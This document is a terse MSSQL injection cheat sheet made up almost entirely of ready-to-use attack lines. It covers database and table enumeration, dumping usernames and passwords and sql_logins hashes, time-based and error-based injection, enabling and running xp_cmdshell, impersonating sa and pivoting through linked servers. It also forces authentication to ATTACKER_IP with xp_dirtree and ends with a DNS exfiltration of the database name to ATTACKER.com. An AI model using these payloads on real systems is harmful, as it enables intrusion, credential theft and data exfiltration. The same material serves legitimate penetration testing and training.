Cheat Sheet — MSSQL

SELECT @@version
-- Comment: -- or /* */
-- String concat: 'a'+'b'
-- No # comments

SELECT db_name()
SELECT system_user
SELECT user_name()
SELECT @@servername
SELECT is_srvrolemember('sysadmin')

SELECT name FROM master.sys.databases
SELECT name FROM master..sysdatabases
SELECT DB_NAME(0)         -- Current
SELECT DB_NAME(1)         -- First database

SELECT name FROM sysobjects WHERE xtype='U'
SELECT table_name FROM information_schema.tables
SELECT name FROM DBNAME..sysobjects WHERE xtype='U'

SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='users')
SELECT column_name FROM information_schema.columns WHERE table_name='users'

SELECT username+':'+password FROM users
SELECT TOP 1 username FROM users
SELECT TOP 1 username FROM users WHERE username NOT IN ('admin')    -- Next row

IF condition BEGIN true END ELSE BEGIN false END
CASE WHEN condition THEN true_val ELSE false_val END
IIF(condition, true_val, false_val)      -- 2012+

WAITFOR DELAY '0:0:5'
IF (1=1) WAITFOR DELAY '0:0:5'

CONVERT(int, (QUERY))
CAST((QUERY) AS int)

-- Enable
EXEC sp_configure 'show advanced options',1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;

-- Execute
EXEC xp_cmdshell 'whoami'
EXEC xp_cmdshell 'type C:\flag.txt'

SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS x

EXEC xp_dirtree '\\ATTACKER_IP\share'
EXEC xp_fileexist '\\ATTACKER_IP\share\file'
EXEC xp_subdirs '\\ATTACKER_IP\share'

EXEC sp_linkedservers
SELECT * FROM OPENQUERY([LINKED],'SELECT @@version')
EXEC ('xp_cmdshell ''whoami''') AT [LINKED_SERVER]

SELECT * FROM sys.server_permissions WHERE permission_name='IMPERSONATE'
EXECUTE AS LOGIN = 'sa'
EXEC xp_cmdshell 'whoami'

SELECT name, password_hash FROM sys.sql_logins

'; EXEC xp_cmdshell 'whoami';-- -
'; INSERT INTO users VALUES('hack','pass');-- -

DECLARE @d varchar(1024)
SET @d=(SELECT DB_NAME())
EXEC('master..xp_dirtree "\\'+@d+'.ATTACKER.com\\x"')